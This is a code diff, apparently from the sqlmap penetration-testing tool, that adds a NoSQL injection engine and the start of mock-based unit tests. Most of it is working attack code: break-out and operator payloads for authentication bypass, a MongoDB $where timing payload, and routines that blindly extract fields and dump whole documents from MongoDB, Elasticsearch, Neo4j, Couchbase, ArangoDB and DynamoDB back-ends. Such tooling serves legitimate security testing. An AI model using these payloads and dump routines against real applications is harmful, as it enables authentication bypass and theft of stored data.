+        return "Solr"
+    if "opensearch" in page:
+        return "OpenSearch"
+    return "Elasticsearch"
+
+def _constraint(place, parameter, eq='=', conj=" AND ", prefix="u."):
+    """Re-expresses every sibling parameter as a prefix + name + eq + 'value' clause (joined and
+    terminated by `conj`) so extraction stays bound to the originally matched record; '' when there
+    are no siblings (Cypher: 'u.'/'='/' AND '; AQL: 'u.'/'=='/' && '; $where JS: 'this.'/'=='/'&&')"""
+
+    parts = []
+
+    for segment in conf.parameters[place].split(_delim(place)):
+        name, separator, value = segment.partition('=')
+        name = name.strip()
+        if separator and name and name != parameter:
+            # backslash-escape '\' and "'" - a raw quote would terminate the literal and break the query
+            literal = value.replace("\\", "\\\\").replace("'", "\\'")
+            parts.append("%s%s%s'%s'" % (prefix, name, eq, literal))
+
+    return (conj.join(parts) + conj) if parts else ""
+
+def _confirm(place, parameter, truePayload, falsePayload):
+    # tells apart dialects sharing a break-out syntax: True when the dialect-specific true/false pair diverges
+    truthy, falsy = [(lambda _=_: _fetchValue(place, parameter, _)) for _ in (truePayload, falsePayload)]
+    return _boolean(truthy, falsy) is not None
+
+def _timed(call):
+    began = time.time()  # wall-clock seconds spent inside call(); its return value is discarded
+    call()
+    return time.time() - began
+
+def _whereDelay(condition):
+    # MongoDB $where (server-side JS) string break-out busy-looping for ~conf.timeSec seconds whenever the per-document
+    # JS `condition` holds (timing oracle); the document is passed in as `d` (inside the function `this` is not the document)
+    millis = int(conf.timeSec * 1000)
+    return "%s' || (function(d){if(%s){var t=new Date().getTime();while(new Date().getTime()-t<%d){}}return false})(this) || '1'=='2" % (NOSQL_SENTINEL, condition, millis)
+
+def _detectWhere(place, parameter):
+    # returns the timing threshold (baseline + timeSec/2) when the unconditional delay runs slower than
+    # it while a non-delaying break-out does not (guards against a uniformly slow endpoint), else None
+    request = lambda value: _timed(lambda: _fetchValue(place, parameter, value))
+    threshold = request(_originalValue(place, parameter) or "1") + conf.timeSec * 0.5
+    if threshold >= conf.timeSec or request(_whereDelay("true")) <= threshold:
+        return None
+    return threshold if request("%s' || '1'=='2" % NOSQL_SENTINEL) <= threshold else None
+
+def _jsString(value):
+    return "'%s'" % "".join("\\" + _ if _ in "\\'" else _ for _ in value)  # single-quoted JS literal with '\' and "'" backslash-escaped
+
+def _whereField(place, parameter, bound, expr, threshold):
+    """Time-based recovery (through the $where busy-loop oracle) of the per-document JavaScript string
+    expression `expr`, e.g. a key name 'Object.keys(d)[i]' or a value 'String(d[name])'"""
+
+    slow = lambda payload: _timed(lambda: _fetchValue(place, parameter, payload)) > threshold
+    atLeast = lambda n: _whereDelay("%s(%s)&&(%s).length>=%d" % (bound, expr, expr, n))
+    startsWith = lambda known, klass: _whereDelay("%s/^%s%s/.test(%s)" % (bound, _javaEscape(known), klass, expr))
+
+    return _extract(None, None, atLeast, startsWith, slow)
+
+def _whereDump(place, parameter, bound, threshold):
+    """Time-based whole-document dump: recovers field names one by one via Object.keys(d)[i] (at most
+    NOSQL_MAX_FIELDS, stopping at the first empty name) and each value via String(d[name]). Returns (columns, rows) or None"""
+
+    pairs = []
+    for position in xrange(NOSQL_MAX_FIELDS):
+        key = _whereField(place, parameter, bound, "Object.keys(d)[%d]" % position, threshold)
+        if not key:
+            break
+        item = _whereField(place, parameter, bound, "String(d[%s])" % _jsString(key), threshold) or ""
+        pairs.append((key, item))
+        logger.info("retrieved: %s='%s'" % (key, item))
+
+    return ([_[0] for _ in pairs], [[_[1] for _ in pairs]]) if pairs else None
+
+def _classChar(ordinal):
+    char = chr(ordinal)  # '[' is escaped as well: Java regexps (Cypher =~) parse a bare '[' inside a class as a nested class
+    return ("\\" + char) if char in "[]\\^-" else char  # escape the char-class metacharacters
+
+def _klass(low, high):
+    members = _classChar(low) if low == high else "%s-%s" % (_classChar(low), _classChar(high))
+    return "[%s]" % members  # regexp character class for the codepoints low..high (single member when equal)
+
def _propLiteral(name):
    """Renders the property `name` as a single-quoted string literal for use inside a query expression
    (e.g. u['name']): backslashes are doubled first, then single quotes are backslash-escaped"""

    escaped = name.replace("\\", "\\\\")
    escaped = escaped.replace("'", "\\'")
    return "'" + escaped + "'"
+
def _enumField(place, parameter, template, payloadFor):
    """Content-based recovery of the string matched by a regexp clause rendered by payloadFor(regexBody),
    driving the bisection extractor against the always-true single-record `template`"""

    def fetch(value):
        return _fetchValue(place, parameter, value)

    def lengthPayload(n):
        return payloadFor(".{%d,}" % n)

    def charPayload(known, klass):
        return payloadFor(_quoted(_javaEscape(known) + klass))

    return _extract(template, fetch, lengthPayload, charPayload)
+
def _enumDump(place, parameter, makePayload, keysExpr, valueExpr):
    """Whole-document dump via key enumeration for the regexp dialects. keysExpr(i) gives the expression
    for the i-th field name and valueExpr(name) the expression for that field's value, while
    makePayload(targetExpr, regexBody) wraps the dialect break-out and record binding around a
    ' matches ^' oracle. Returns (columns, rows) with a single row, or None (no usable
    template or no field name recovered) so the caller can fall back to single-field extraction"""

    # response of the bound single record (first key matched against anything)
    template = _fetchValue(place, parameter, makePayload(keysExpr(0), ".*"))
    if not template or _isError(template):
        return None

    columns = []
    values = []

    for index in xrange(NOSQL_MAX_FIELDS):
        # defaults bind the current index/name (avoids the late-binding closure pitfall)
        nameFor = lambda rb, i=index: makePayload(keysExpr(i), rb)
        name = _enumField(place, parameter, template, nameFor)
        if not name:
            break
        columns.append(name)

        valueFor = lambda rb, n=name: makePayload(valueExpr(n), rb)
        values.append(_enumField(place, parameter, template, valueFor) or "")
        logger.info("retrieved: %s='%s'" % (name, values[-1]))

    if not columns:
        return None

    return (columns, [values])
+
def _minIdGreater(exists, lower):
    """Returns the smallest internal node id strictly greater than `lower` for which the boolean oracle
    exists(condition) holds, or None when no further node exists (or none within 2^40 of `lower`)"""

    if not exists("id(u) > %d" % lower):
        return None

    # gallop with a doubling *offset* from `lower`: doubling the upper bound itself never advances
    # when it starts at 0 (lower == -1) and would spin forever if the first matched id is not 0
    step = 1
    while not exists("id(u) > %d AND id(u) <= %d" % (lower, lower + step)):
        step *= 2
        if step > (1 << 40):
            return None

    # invariant: no matching id in (lower, lo], at least one in (lower, hi]
    lo, hi = lower + step // 2, lower + step
    while lo + 1 < hi:
        mid = (lo + hi) // 2
        if exists("id(u) > %d AND id(u) <= %d" % (lower, mid)):
            hi = mid
        else:
            lo = mid

    return hi

def _cypherDump(place, parameter):
    """Blind multi-record collection dump (Neo4j Cypher). Walks every matched node in ascending order
    of its internal node id (a unique, ordered, always-present key - unlike property order, which Neo4j
    does not guarantee), key-enumerating each node's full document. At most NOSQL_MAX_RECORDS nodes are
    visited. Returns (columns, rows) or None when the boolean oracle is unusable or nothing was dumped"""

    fetch = lambda payload: _fetchValue(place, parameter, payload)
    noMatch = fetch("%s' OR '1'='2" % NOSQL_SENTINEL)   # stable zero-record baseline (app closes the quote)
    differs = lambda payload: _ratio(fetch(payload), noMatch) < UPPER_RATIO_BOUND
    if not noMatch or not differs("%s' OR '1'='1" % NOSQL_SENTINEL):
        return None

    # a numeric condition opens no string, so balance the app's trailing quote with a tautology
    exists = lambda cond: differs("%s' OR %s AND '1'='1" % (NOSQL_SENTINEL, cond))

    columns, records, lastId = [], [], -1
    for _ in xrange(NOSQL_MAX_RECORDS):
        nodeId = _minIdGreater(exists, lastId)
        if nodeId is None:
            break

        record = _enumDump(place, parameter,
            lambda expr, rb, k=nodeId: "%s' OR id(u)=%d AND %s =~ '^%s.*" % (NOSQL_SENTINEL, k, expr, rb),
            lambda i: "keys(u)[%d]" % i, lambda n: "toString(u[%s])" % _propLiteral(n))
        if record:
            cols, values = record
            records.append(dict(zip(cols, values[0])))  # align by field name (keys(u) order is per-node)
            columns.extend(_ for _ in cols if _ not in columns)

        lastId = nodeId     # advance even when this node's dump failed, so the walk always progresses

    return (columns, [[row.get(_, "") for _ in columns] for row in records]) if records else None
+
def _partiqlValue(place, parameter, bind, field):
    """Blind extraction of `field` for the bound record on a DynamoDB PartiQL point. PartiQL has no
    regexp, so each character is recovered by an ordered string comparison (field >= 'prefix'+char),
    bisected over [NOSQL_CHAR_MIN, NOSQL_CHAR_MAX]. Returns the value, or None when the always-true
    template is unusable or nothing was recovered"""

    def probe(literal):
        # the trailing quote is left open on purpose (the same shape as the template request)
        return _fetchValue(place, parameter, "%s' OR %s%s >= '%s" % (NOSQL_SENTINEL, bind, field, literal))

    template = probe("")    # field >= '' -> bound record matches
    if not template or _isError(template):
        return None

    def atLeast(value):
        # PartiQL escapes a single quote by doubling it
        return _ratio(probe(value.replace("'", "''")), template) > UPPER_RATIO_BOUND

    retVal = ""
    while len(retVal) < NOSQL_MAX_LENGTH:
        # no character at this position -> end of value
        if not atLeast(retVal + chr(NOSQL_CHAR_MIN)):
            break

        # greatest character for which the comparison still holds
        floor, ceiling = NOSQL_CHAR_MIN, NOSQL_CHAR_MAX
        while floor < ceiling:
            middle = (floor + ceiling + 1) // 2
            if atLeast(retVal + chr(middle)):
                floor = middle
            else:
                ceiling = middle - 1

        retVal += chr(floor)

    if not retVal:
        return None

    return retVal
+
def _partiqlDump(place, parameter, key):
    """DynamoDB PartiQL: comparison-extracts the injected field, bound to its record by sibling
    parameters (PartiQL exposes no key-enumeration, so the dumpable field is the injected one).
    Returns ([key], [[value]]) or None when no binding constraint or no value is available"""

    bind = _constraint(place, parameter, "=", " AND ", prefix="")

    # without a sibling constraint a single record cannot be pinned
    if not bind:
        return None

    value = _partiqlValue(place, parameter, bind, key)
    if value is None:
        return None

    return ([key], [[value]])
+
def _extract(template, fetchFn, lengthValue, charValue, truthFn=None):
    """Blind value recovery: finds the length by doubling then binary search (capped at
    NOSQL_MAX_LENGTH), then bisects each character's codepoint over [NOSQL_CHAR_MIN, NOSQL_CHAR_MAX]
    using regexp character-class ranges (~log2(range) requests per character instead of a linear scan).
    lengthValue(n) and charValue(known, charClass) render the dialect payload; the oracle is
    `truthFn(payload)` when given (e.g. the $where timing predicate), otherwise the content ratio of
    fetchFn(payload) against `template`. Returns the recovered string, or None for zero length"""

    def byContent(value):
        return _ratio(fetchFn(value), template) > UPPER_RATIO_BOUND

    truth = truthFn or byContent

    # exponential probe: `lower` is the largest length known to hold (0 when none does)
    lower, probe = 0, 1
    while probe <= NOSQL_MAX_LENGTH:
        if not truth(lengthValue(probe)):
            break
        lower = probe
        probe *= 2

    # binary search between the last true length and the first false (or capped) one
    upper = min(probe, NOSQL_MAX_LENGTH + 1)
    while upper - lower > 1:
        middle = (lower + upper) // 2
        if truth(lengthValue(middle)):
            lower = middle
        else:
            upper = middle

    if not lower:
        return None

    debugMsg = "retrieving the value (%d characters)" % lower
    logger.debug(debugMsg)

    retVal = ""
    for _ in xrange(lower):
        first, last = NOSQL_CHAR_MIN, NOSQL_CHAR_MAX

        if truth(charValue(retVal, _klass(first, last))):
            # narrow [first, last] until a single codepoint remains
            while first < last:
                middle = (first + last) // 2
                if truth(charValue(retVal, _klass(first, middle))):
                    last = middle
                else:
                    first = middle + 1
            retVal += chr(first)
        else:
            # character outside the searched range
            # NOTE(review): the placeholder becomes part of `known` for later positions; callers that
            # regexp-escape `known` will presumably match a literal '?' from then on - confirm
            retVal += '?'

    return retVal
+
def _resolve(place, parameter, key):
    """Tries each NoSQL dialect in turn (operator injection, Lucene query_string, ' OR ' break-out,
    ' || ' break-out, numeric context, $where time-based, error-based); the first that detects fixes
    the back-end and the extraction payloads. Returns a Vector (whose `template`/`lengthValue` are None
    for detection-only back-ends) or None when nothing matches"""

    field = "u.%s" % key
    byValue = lambda value: _fetchValue(place, parameter, value)

    # MongoDB/CouchDB operator injection
    template = _detectMongo(place, parameter)
    if template:
        return Vector(_fingerprintMongo(place, parameter),
            lambda value: _fetch(place, parameter, "$regex", value),
            lambda n: "^.{%d,}$" % n,
            lambda known, klass: "^%s%s" % (re.escape(known), klass),
            template=template, bypass='{"$ne": null}')

    # Lucene query_string
    template = _detectES(place, parameter)
    if template:
        return Vector(_fingerprintLucene(place, parameter),
            byValue,
            lambda n: "/.{%d,}/" % n,
            lambda known, klass: "/%s%s.*/" % (_lucene(known), klass),
            template=template, bypass='*')

    template = _detectCypher(place, parameter)
    if template:
        constraint = _constraint(place, parameter)

        cypherRegex = "%s' OR %s%s =~ '%s"
        n1qlRegex = "%s' OR REGEXP_CONTAINS(%s, '%s') OR '1'='2"
        partiqlPrefix = "%s' OR begins_with(%s, '%s') OR '1'='2"

        # Neo4j Cypher, Couchbase N1QL and DynamoDB PartiQL all share the ' OR '1'='1 break-out; tell
        # them apart by the regexp/string primitive the back-end honors ('=~', 'REGEXP_CONTAINS', or
        # PartiQL 'begins_with')
        honorsCypher = _confirm(place, parameter,
            cypherRegex % (NOSQL_SENTINEL, constraint, field, ".*"),
            cypherRegex % (NOSQL_SENTINEL, constraint, field, NOSQL_SENTINEL))

        if not honorsCypher:
            isCouchbase = _confirm(place, parameter,
                n1qlRegex % (NOSQL_SENTINEL, field, ".*"),
                n1qlRegex % (NOSQL_SENTINEL, field, NOSQL_SENTINEL))
            if isCouchbase:
                return Vector("Couchbase",
                    byValue,
                    lambda n: n1qlRegex % (NOSQL_SENTINEL, field, "^.{%d,}" % n),
                    lambda known, klass: n1qlRegex % (NOSQL_SENTINEL, field, "^%s" % _quoted(_javaEscape(known) + klass)),
                    template=template, bypass="' OR '1'='1",
                    dump=lambda: _enumDump(place, parameter,
                        lambda expr, rb: n1qlRegex % (NOSQL_SENTINEL, expr, "^%s" % rb),
                        lambda i: "OBJECT_NAMES(u)[%d]" % i,
                        lambda n: "TOSTRING(u[%s])" % _propLiteral(n)))

            isDynamo = _confirm(place, parameter,
                partiqlPrefix % (NOSQL_SENTINEL, key, ""),
                partiqlPrefix % (NOSQL_SENTINEL, key, NOSQL_SENTINEL))
            if isDynamo:
                return Vector("DynamoDB", None, None, None, template=template, bypass="' OR '1'='1",
                    dump=lambda: _partiqlDump(place, parameter, key))

        # default label for this break-out (also reached when no primitive could be confirmed)
        return Vector("Neo4j", None, None, None, template=template, bypass="' OR '1'='1",
            dump=lambda: _cypherDump(place, parameter) or _enumDump(place, parameter,
                lambda expr, rb: "%s' OR %s%s =~ '^%s.*" % (NOSQL_SENTINEL, constraint, expr, rb),
                lambda i: "keys(u)[%d]" % i,
                lambda n: "toString(u[%s])" % _propLiteral(n)))

    template = _detectAQL(place, parameter)
    if template:
        constraint = _constraint(place, parameter, "==", " && ")

        # ArangoDB AQL and MongoDB $where (server-side JavaScript) both satisfy the ' || '1'=='1
        # break-out; tell them apart by which regexp-match primitive holds - AQL '=~' or a JS /re/.test()
        honorsAql = _confirm(place, parameter,
            "%s' || ('x' =~ '.') || '1'=='2" % NOSQL_SENTINEL,
            "%s' || ('x' =~ 'y') || '1'=='2" % NOSQL_SENTINEL)

        # the JavaScript probe is only issued when the AQL one did not hold
        if not honorsAql and _confirm(place, parameter,
                "%s' || /./.test('x') || '1'=='2" % NOSQL_SENTINEL,
                "%s' || /y/.test('x') || '1'=='2" % NOSQL_SENTINEL):
            bound = _constraint(place, parameter, "==", "&&", prefix="this.")
            whereTemplate = _fetchValue(place, parameter, "%s' || (%sthis.%s) || '1'=='2" % (NOSQL_SENTINEL, bound, key))
            return Vector("MongoDB ($where)",
                byValue,
                lambda n: "%s' || (%sthis.%s&&this.%s.length>=%d) || '1'=='2" % (NOSQL_SENTINEL, bound, key, key, n),
                lambda known, klass: "%s' || (%sthis.%s&&/^%s%s/.test(this.%s)) || '1'=='2" % (NOSQL_SENTINEL, bound, key, _javaEscape(known), klass, key),
                template=whereTemplate, bypass="' || '1'=='1")

        aqlRegex = "%s' || (%s%s =~ '^%s') || '1'=='2"
        return Vector("ArangoDB",
            byValue,
            lambda n: aqlRegex % (NOSQL_SENTINEL, constraint, field, ".{%d,}" % n),
            lambda known, klass: aqlRegex % (NOSQL_SENTINEL, constraint, field, _quoted(_javaEscape(known) + klass)),
            template=template, bypass="' || '1'=='1",
            dump=lambda: _enumDump(place, parameter,
                lambda expr, rb: aqlRegex % (NOSQL_SENTINEL, constraint, expr, rb),
                lambda i: "ATTRIBUTES(u)[%d]" % i,
                lambda n: "TO_STRING(u[%s])" % _propLiteral(n)))

    numeric = _detectNumeric(place, parameter)
    if numeric:
        dbms, template, bypass = numeric
        dump = None

        # bind the dump to the injected numeric field (e.g. u.id = 1)
        if dbms == "Neo4j":
            value = (_originalValue(place, parameter) or "1").strip()
            dump = lambda: _enumDump(place, parameter,
                lambda expr, rb: "%s AND (%s =~ '^%s.*')" % (value, expr, rb),
                lambda i: "keys(u)[%d]" % i,
                lambda n: "toString(u[%s])" % _propLiteral(n))

        return Vector(dbms, None, None, None, template=template, bypass=bypass, dump=dump)

    # time-based server-side JavaScript
    threshold = _detectWhere(place, parameter)
    if threshold is not None:
        bound = _constraint(place, parameter, "==", "&&", prefix="d.")
        return Vector("MongoDB ($where)", None, None, None,
            dump=lambda: _whereDump(place, parameter, bound, threshold))

    # error-based (detection only)
    engine = _detectError(place, parameter)
    if engine:
        return Vector(engine, None, None, None)

    return None
+
def _inband(place, parameter, template):
    """In-band data exposure gate: returns the always-true response `template` when it carries
    materially more (reflected) content than the response to the original request - i.e. it is longer,
    its ratio against the original is below UPPER_RATIO_BOUND and it does not look like an engine
    error - else None"""

    original = _fetchValue(place, parameter, _originalValue(place, parameter) or "1")

    # other call sites guard _fetchValue() results for falsiness; a missing baseline cannot be
    # measured (len(None) would raise), so report no exposure instead of crashing
    if original is None:
        return None

    if not template or len(template) <= len(original):
        return None

    if _ratio(template, original) >= UPPER_RATIO_BOUND:
        return None

    if re.search(NOSQL_ERROR_REGEX, template):
        return None

    return template
+
def _clean(cell):
    """Reduces a reflected HTML fragment to plain text: strips tags, decodes the basic character
    entities and collapses runs of whitespace into single spaces"""

    cell = re.sub(r"(?s)<[^>]+>", "", cell)

    # '&amp;' is decoded last so that an escaped entity (e.g. '&amp;lt;') yields the literal text
    # '&lt;' instead of being decoded twice into '<'
    for entity, char in (("&lt;", '<'), ("&gt;", '>'), ("&quot;", '"'), ("&#39;", "'"), ("&#x27;", "'"), ("&amp;", '&')):
        cell = cell.replace(entity, char)

    return re.sub(r"\s+", " ", cell).strip()
+
def _records(page):
    """Parses structured records out of a reflected response - a JSON array of objects (top-level, or
    the first list value of a top-level object) or an HTML table - returning (columns, rows) for a
    tabular dump, else None"""

    try:
        data = json.loads(page, object_pairs_hook=OrderedDict)
    except (ValueError, TypeError):     # not JSON (or not a string at all)
        data = None

    if isinstance(data, list):
        rows = data
    elif isinstance(data, dict):
        rows = next((_ for _ in data.values() if isinstance(_, list)), None)
    else:
        rows = None

    rows = [_ for _ in (rows or []) if isinstance(_, dict)]
    if rows:
        # union of the keys in first-seen order (objects may carry different fields)
        columns = []
        for row in rows:
            columns.extend(_ for _ in row if _ not in columns)
        return columns, [[("NULL" if row[_] is None else _clean("%s" % row[_])) if _ in row else "" for _ in columns] for row in rows]

    for body in re.findall(r"(?is)<table.*?</table>", page or ""):
        header, rows = None, []

        for index, tr in enumerate(re.findall(r"(?is)<tr\b[^>]*>(.*?)</tr>", body)):
            cells = re.findall(r"(?is)<t[dh]\b[^>]*>(.*?)</t[dh]>", tr)
            if index == 0 and re.search(r"(?i)<th[\s>]", tr):
                header = [_clean(_) for _ in cells]     # a leading row of <th> cells names the columns
            elif cells:
                rows.append([_clean(_) for _ in cells])

        if rows:
            width = max(len(_) for _ in rows)
            # the header is only trusted when it matches the widest row; short rows are right-padded
            columns = header if header and len(header) == width else ["column_%d" % (_ + 1) for _ in xrange(width)]
            return columns, [row + [""] * (width - len(row)) for row in rows]

    return None
+
def _grid(columns, rows):
    """Renders (columns, rows) as a sqlmap-style ASCII table. Each column is as wide as its longest
    cell (header included); rows shorter than the header are padded with empty cells and cells beyond
    the header width are not rendered"""

    widths = []
    for index, column in enumerate(columns):
        longest = len(column)
        for row in rows:
            if index < len(row):
                longest = max(longest, len(row[index]))
        widths.append(longest)

    separator = "+%s+" % "+".join("-" * (width + 2) for width in widths)

    def line(cells):
        padded = []
        for index, width in enumerate(widths):
            cell = cells[index] if index < len(cells) else ""
            padded.append(cell.ljust(width))
        return "| %s |" % " | ".join(padded)

    lines = [separator, line(columns), separator]
    lines.extend(line(row) for row in rows)
    lines.append(separator)

    return "\n".join(lines)
+
def _dumpInband(place, key, page):
    """Outputs in-band records through conf.dumper: as a regular sqlmap-style table when `page` parses
    into records, otherwise as tag-stripped, whitespace-collapsed text cut to NOSQL_DUMP_LIMIT"""

    parsed = _records(page)

    if not parsed:
        text = re.sub(r"(?s)<[^>]+>", " ", page)
        text = re.sub(r"\s+", " ", text).strip()
        conf.dumper.singleString("NoSQL: %s parameter '%s' in-band data: %s" % (place, key, text[:NOSQL_DUMP_LIMIT]))
        return

    columns, rows = parsed
    conf.dumper.singleString("NoSQL: %s parameter '%s' in-band records [%d]:\n%s" % (place, key, len(rows), _grid(columns, rows)))
+
def nosqlScan():
    """Entry point for '--nosql': detects NoSQL injection (MongoDB/CouchDB operator, Lucene
    query_string, Cypher/N1QL/AQL string break-out, MongoDB $where time-based, or error-based). On a
    confirmed point it reports the vector and then tries to dump the reachable document(s), to dump
    records exposed in-band by the always-true payload, and to blindly recover the targeted field via
    the regexp/timing oracle"""

    global NOSQL_SENTINEL
    NOSQL_SENTINEL = randomStr(length=10, lowercase=True)

    # NoSQL injection from an application-scoped point is confined to the back-end's single query
    # (one collection/label) - it confirms and dumps what that query can reach, with no analog to the
    # SQL database/table/user/banner enumeration, so those switches do not apply here
    infoMsg = "'--nosql' is self-contained: it confirms the injection and dumps the reachable "
    infoMsg += "collection/document. SQL enumeration switches (e.g. --banner, --dbs, --tables, "
    infoMsg += "--users, --sql-query) do not map to a NoSQL back-end and are ignored"
    logger.info(infoMsg)

    tested = 0
    found = 0

    for place in NOSQL_PLACES:
        if place not in conf.paramDict:
            continue

        for parameter in list(conf.paramDict[place].keys()):
            key = _jsonKey(parameter)

            # honor an explicit parameter selection (by either the JSON key or the raw name)
            if conf.testParameter and key not in conf.testParameter and parameter not in conf.testParameter:
                continue

            tested += 1
            infoMsg = "testing NoSQL injection on %s parameter '%s'" % (place, key)
            logger.info(infoMsg)

            vector = _resolve(place, parameter, key)
            if not vector:
                continue

            found += 1
            infoMsg = "%s parameter '%s' is vulnerable to NoSQL injection (back-end: '%s')" % (place, key, vector.dbms)
            logger.info(infoMsg)

            # standard sqlmap-style injection-point summary (reproducible vector)
            bypass = vector.bypass
            if bypass == '{"$ne": null}':
                title = "operator injection"
                payload = "%s[$ne]=%s" % (key, NOSQL_SENTINEL)
            elif bypass == '*':
                title = "Lucene query_string injection"
                payload = "%s=*" % key
            elif bypass:
                context = "numeric" if bypass[:1].isdigit() else "string"
                title = "boolean-based blind (%s)" % context
                payload = "%s=%s" % (key, bypass)
            elif vector.dump is not None:
                title = "time-based blind (server-side JavaScript $where)"
                payload = "%s=' || (sleep loop) || '" % key
            else:
                title = "error-based"
                payload = "%s=%s'" % (key, _originalValue(place, parameter) or "1")

            report = "---\nParameter: %s (%s)\n    Type: NoSQL injection\n    Title: %s %s\n    Payload: %s\n---" % (key, place, vector.dbms, title, payload)
            conf.dumper.singleString(report)

            if vector.bypass:
                infoMsg = "%s parameter '%s' can be coerced always-true with '%s' (e.g. authentication/filter bypass)" % (place, key, vector.bypass)
                logger.info(infoMsg)

            dumped = False

            # a named whole-document dump is preferred over the unnamed in-band table
            if vector.dump is not None:
                infoMsg = "retrieving the reachable document(s)"
                logger.info(infoMsg)

                records = vector.dump()
                if records:
                    columns, rows = records
                    infoMsg = "dumped %d record%s (%d field%s)" % (len(rows), 's' if len(rows) != 1 else '', len(columns), 's' if len(columns) != 1 else '')
                    logger.info(infoMsg)
                    conf.dumper.singleString("NoSQL: %s parameter '%s' %s:\n%s" % (place, key, "documents" if len(rows) != 1 else "document", _grid(columns, rows)))
                    dumped = True

            if not dumped and vector.template is not None:
                exposure = _inband(place, parameter, vector.template)
                if exposure:
                    infoMsg = "the always-true payload returns additional records (in-band data exposure)"
                    logger.info(infoMsg)
                    _dumpInband(place, key, exposure)
                    dumped = True

            # single-field blind extraction is attempted whenever the vector provides payloads for it
            if vector.lengthValue is not None:
                value = _extract(vector.template, vector.fetch, vector.lengthValue, vector.charValue, vector.truth)
                if value is not None:
                    conf.dumper.singleString("NoSQL: %s parameter '%s' -> %s" % (place, key, repr(value)))
                    dumped = True

            if dumped:
                continue

            if vector.template is None and vector.truth is None and vector.dump is None:
                warnMsg = "injection is detection-only for back-end '%s' (no extraction oracle for this engine)" % vector.dbms
            else:
                warnMsg = "injection on '%s' is confirmed but yielded no data here: this point exposes only a boolean oracle on a non-extractable (e.g. numeric) field. Target a string-compared parameter (e.g. a login/search field) to blindly read a value" % key
            logger.warning(warnMsg)

    if not found:
        warnMsg = "no parameter appears to be injectable via NoSQL injection (%d tested)" % tested
        logger.warning(warnMsg)
diff --git a/tests/test_nosql.py b/tests/test_nosql.py
new file mode 100644
index 00000000000..3703471f8ce
--- /dev/null
+++ b/tests/test_nosql.py
@@ -0,0 +1,650 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
+See the file 'LICENSE' for copying permission
+
+Offline, deterministic tests for the NoSQL injection engine. Mock oracles stand in for the
+HTTP/back-end layer so detection and blind extraction can be exercised without a live target,
+covering each dialect: MongoDB/CouchDB operator injection, Elasticsearch/Solr query_string,
+Neo4j Cypher and ArangoDB AQL string break-out.
+"""
+
+import re
+import unittest
+
+from _testutils import bootstrap
+bootstrap()
+
+import lib.techniques.nosql.inject as ni
+
+SECRET = "S3cr3t_9"
+MATCH = "Welcome user; rows: alpha, bravo, charlie"
+NOMATCH = "Invalid credentials; no rows"
+
+
def _mongo(place, parameter, op, value, isArray=False):
    """Mock of ni._fetch for an operator-injectable endpoint: '$ne' always matches, '$in' never does
    and '$regex' matches when `value` matches SECRET from its start (an invalid pattern yields an error
    page); any other operator returns an empty response"""

    if op == "$regex":
        try:
            matched = re.match(value, SECRET) is not None
        except re.error:
            return "error: invalid regular expression"
        return MATCH if matched else NOMATCH

    if op == "$ne":
        return MATCH
    if op == "$in":
        return NOMATCH
    return ""
+
+
def _es(place, parameter, value):
    """Mock of ni._fetchValue for a Lucene query_string endpoint: '*' matches, the sentinel does not,
    and a /regexp/ value matches when it covers the whole of SECRET (an invalid pattern yields an
    error page)"""

    if value == "*":
        return MATCH
    if value == ni.NOSQL_SENTINEL:
        return NOMATCH

    isRegexp = value.startswith("/") and value.endswith("/")
    if not isRegexp:
        return NOMATCH

    # Lucene regexp is full-anchored
    try:
        matched = re.match("^(?:%s)$" % value[1:-1], SECRET) is not None
    except re.error:
        return "error: parse_exception"

    return MATCH if matched else NOMATCH
+
+
class TestNoSqlMongo(unittest.TestCase):
    """MongoDB/CouchDB operator injection: detection and $regex-driven blind extraction against the
    `_mongo` mock"""

    def setUp(self):
        # swap the HTTP layer for the mock; restored in tearDown()
        self._orig = ni._fetch
        ni._fetch = _mongo

    def tearDown(self):
        ni._fetch = self._orig

    def test_detect(self):
        self.assertTrue(ni._detectMongo("GET", "password"))

    def test_extract(self):
        fetch = lambda v: ni._fetch("GET", "password", "$regex", v)
        lengthValue = lambda n: "^.{%d,}$" % n
        charValue = lambda known, klass: "^" + re.escape(known) + klass

        template = ni._fetch("GET", "password", "$ne", ni.NOSQL_SENTINEL)
        self.assertEqual(ni._extract(template, fetch, lengthValue, charValue), SECRET)

    def test_not_injectable(self):
        # an endpoint answering identically to everything gives no oracle
        ni._fetch = lambda *args, **kwargs: MATCH
        self.assertIsNone(ni._detectMongo("GET", "password"))
+
+
class TestNoSqlElasticsearch(unittest.TestCase):
    """Lucene query_string injection: detection and /regexp/-driven blind extraction against the `_es`
    mock"""

    def setUp(self):
        # swap the HTTP layer for the mock; restored in tearDown()
        self._orig = ni._fetchValue
        ni._fetchValue = _es

    def tearDown(self):
        ni._fetchValue = self._orig

    def test_detect(self):
        self.assertTrue(ni._detectES("GET", "q"))

    def test_extract(self):
        fetch = lambda v: ni._fetchValue("GET", "q", v)
        lengthValue = lambda n: "/.{%d,}/" % n
        charValue = lambda known, klass: "/%s%s.*/" % (ni._lucene(known), klass)

        template = ni._fetchValue("GET", "q", "*")
        self.assertEqual(ni._extract(template, fetch, lengthValue, charValue), SECRET)

    def test_not_injectable(self):
        # an endpoint answering identically to everything gives no oracle
        ni._fetchValue = lambda *args, **kwargs: MATCH
        self.assertIsNone(ni._detectES("GET", "q"))
+
+
def _cypher(place, parameter, value):
    """Mock of ni._fetchValue for a Cypher string break-out: the '1'='1 tautology matches, '1'='2 does
    not, and an =~ '^...' clause matches when its body covers the whole of SECRET"""

    if "'1'='1" in value:
        return MATCH
    if "'1'='2" in value:
        return NOMATCH

    # the regex body after the =~ operator (up to the end of the payload)
    found = re.search(r"=~ '\^(.*)$", value)
    if not found:
        return NOMATCH

    try:
        matched = re.match("^(?:%s)$" % found.group(1), SECRET) is not None
    except re.error:
        return NOMATCH

    return MATCH if matched else NOMATCH
+
+
class TestNoSqlCypher(unittest.TestCase):
    """Neo4j Cypher string break-out: detection and =~ driven blind extraction against the `_cypher`
    mock"""

    def setUp(self):
        # swap the HTTP layer for the mock; restored in tearDown()
        self._orig = ni._fetchValue
        ni._fetchValue = _cypher

    def tearDown(self):
        ni._fetchValue = self._orig

    def test_detect(self):
        self.assertTrue(ni._detectCypher("GET", "password"))

    def test_extract(self):
        fetch = lambda v: ni._fetchValue("GET", "password", v)
        lengthValue = lambda n: "%s' OR u.password =~ '^.{%d,}" % (ni.NOSQL_SENTINEL, n)
        charValue = lambda known, klass: "%s' OR u.password =~ '^%s%s.*" % (ni.NOSQL_SENTINEL, ni._javaEscape(known), klass)

